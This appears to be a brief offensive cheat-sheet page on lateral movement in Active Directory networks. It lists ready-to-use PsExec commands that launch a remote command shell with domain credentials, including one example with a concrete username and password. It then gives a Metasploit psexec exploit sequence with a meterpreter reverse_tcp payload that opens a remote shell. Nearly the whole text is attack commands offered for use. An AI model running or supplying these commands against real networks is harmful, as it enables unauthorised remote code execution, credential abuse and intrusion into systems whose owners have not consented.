>_ shadow.red

PsExec - Remote Command Execution

Active Directory Lateral Movement windows linux

Drop and run on the target

PsExec64.exe -i \\KOMPUTER -u DOMENA\USER -p HASLO cmd
PsExec64.exe -i \\BACKUP-SRV -u firma\marek -p Trudne$Haslo99 cmd

Metasploit psexec

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
exploit